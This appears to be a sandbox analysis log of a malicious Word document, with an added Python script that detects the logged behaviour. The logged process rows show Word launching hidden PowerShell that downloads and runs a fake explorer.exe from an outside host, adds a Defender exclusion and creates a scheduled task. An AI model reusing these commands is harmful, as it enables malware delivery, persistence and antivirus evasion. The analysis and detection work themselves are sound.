          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......u.y...e.x.e.....................l........w......................0......._.......h...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....................x........w......................0......._.......h...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................x........x......................0.......k.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................x....... x......................0.......k.......h...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.......h.......2.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....................l.......tx......................0.......w.......h...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................l........x......................0.......................l.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................l........x......................0...............h...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................l........x......................0...............h...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................l........y......................0...............h...............................
          Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ....................l.).........E.R.R.O.R.:. ...h.......P...............gs................................................................).....
          Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ....................l.).........E.R.R.O.(.P.....h.......P...............ms..............................................j.......H.........).....
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....l...............................................0.......#.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....l...............x...............................0.......#.......H...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....l...............x...............................0......./......................... .............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....l...............x...............................0......./.......H...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....l...............x.......4.......................0.......;...............|......... .............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....l.......................Q.......................0.......;.......H...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......y.......................0.......G.......H......."......... .............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....l...............................................0.......G.......H................. .............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....l...............x...............................0.......S......................... .............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....l...............x...............................0.......S.......H...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......u.y...e.x.e.....l...............x...............................0......._.......H................. .............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....l...............x...............................0......._.......H................. .............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....l.......................F.......................0.......k......................... .............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....l.......................a.......................0.......k.......H...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.......H.......2......... .............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....l...............................................0.......w.......H................. .............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....l...............................................0.......................l......... .............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....l...............................................0...............H...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....l...............x...............................0...............H................. .............
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....l...............x.......0.......................0...............H................. .............
          Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................E.R.R.O.R.:. ...P...............|................................................. .............................
          Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................E.R.R.O.(.P.....P...............|.......................................................j.......X...............
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpE14B.tmp
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmp6336.tmp
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpFA37.tmp
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpE14B.tmp
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmp6336.tmp
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpFA37.tmp
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
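The "Process created" rows above carry the whole infection chain in one place: WINWORD.EXE launching a hidden, policy-bypassing PowerShell that downloads a file named explorer.exe into AppData\Roaming, cmd.exe starting that copy, the copy adding a Defender exclusion, registering a scheduled task from an XML in Temp, and finally starting an argument-less MSBuild.exe as a host for injection. The script below is an added example by the editor, not part of the Joe Sandbox report: it parses rows in this exact format (tolerating the fused "...EXEProcess created:" form) into parent/child events and runs a small set of detection rules over them. The rule names, the lists of Office/shell/system-binary names and the subset of report lines used as input are the editor's own choices.

```python
"""Parse Joe Sandbox "Process created" rows and flag suspicious parent/child chains.

Added example; not code from the report.  Rule names and process lists are assumptions.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from ntpath import basename  # handles Windows paths on any host OS

# Sample input: a subset of the report's own "Process created" rows (constructed here).
SAMPLE_LINES = r"""
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpE14B.tmp
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\explorer.exe
"""

# Parent may be fused with "Process created:" (extraction artifact); child image has no spaces here.
LINE_RE = re.compile(r"^Source:\s*(?P<parent>.*?)\s*Process created:\s*(?P<child>\S+)(?:\s+(?P<cmd>.*))?$")
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)  # matches the report's "httP://" spelling too

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}          # assumed list
SHELLS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}  # assumed list
SYSTEM_NAMES = {"explorer.exe", "svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe"}  # benign names that only belong under C:\Windows
LOLBIN_HOSTS = {"msbuild.exe", "regasm.exe", "regsvcs.exe", "installutil.exe"}  # common injection hosts


@dataclass(frozen=True)
class ProcEvent:
    parent: str
    child: str
    cmdline: str


def parse_process_lines(text):
    """Return one ProcEvent per 'Process created' row; other rows are ignored."""
    events = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if m:
            events.append(ProcEvent(m["parent"], m["child"], m["cmd"] or ""))
    return events


def is_user_writable(path):
    p = path.lower()
    return "\\users\\" in p or "\\temp\\" in p or "\\programdata\\" in p


def evaluate(events):
    """Apply the rules; return unique (rule, parent_image, child_image) tuples in first-seen order."""
    findings = []
    for ev in events:
        p, c, cmd = basename(ev.parent).lower(), basename(ev.child).lower(), ev.cmdline.lower()
        if p in OFFICE and c in SHELLS:
            findings.append(("office_spawns_shell", p, c))
        if c == "powershell.exe":
            if "-executionpolicy bypass" in cmd or "-w hidden" in cmd:
                findings.append(("powershell_bypass_hidden", p, c))
            if "downloadfile(" in cmd or "downloadstring(" in cmd:
                findings.append(("powershell_download", p, c))
            if "add-mppreference" in cmd and "-exclusionpath" in cmd:
                findings.append(("defender_exclusion", p, c))
        if c in SYSTEM_NAMES and not ev.child.lower().startswith("c:\\windows\\"):
            findings.append(("system_name_outside_windows", p, c))
        if c == "schtasks.exe" and "/create" in cmd and "/xml" in cmd and "\\temp\\" in cmd:
            findings.append(("schtasks_xml_from_temp", p, c))
        if c in LOLBIN_HOSTS and is_user_writable(ev.parent):
            findings.append(("lolbin_spawned_from_user_dir", p, c))
    seen, unique = set(), []
    for f in findings:
        if f not in seen:
            seen.add(f)
            unique.append(f)
    return unique


def download_urls(events):
    """URLs pulled from PowerShell command lines (payload staging indicators)."""
    urls = set()
    for ev in events:
        if basename(ev.child).lower() == "powershell.exe":
            urls.update(URL_RE.findall(ev.cmdline))
    return sorted(urls)


def process_tree(events):
    """Parent image -> sorted list of distinct child images."""
    tree = defaultdict(set)
    for ev in events:
        tree[basename(ev.parent).lower()].add(basename(ev.child).lower())
    return {k: sorted(v) for k, v in tree.items()}


if __name__ == "__main__":
    evs = parse_process_lines(SAMPLE_LINES)
    for parent, children in process_tree(evs).items():
        print(f"{parent} -> {', '.join(children)}")
    for rule, parent, child in evaluate(evs):
        print(f"[{rule}] {parent} -> {child}")
    print("download URLs:", download_urls(evs))
```

Each rule is independent, so a single row can trip several (the Word-to-PowerShell row trips three), and the tuple form keeps the parent in the finding: Add-MpPreference run from a binary in AppData\Roaming is a very different signal from the same cmdlet run by an admin's console. Feeding the full set of rows from this report instead of the subset changes nothing but the counts, since the chain repeats verbatim.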
          Source: C:\Users\user\AppData\Roaming\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR52EF.tmpJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
          Source: C:\Users\user\AppData\Roaming\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\explorer.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\explorer.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\explorer.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\explorer.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\explorer.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\explorer.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory created: C:\Program Files\Microsoft DN1
          Source: Binary string: mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: scorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: :\Windows\mscorlib.pdbXr`g source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp
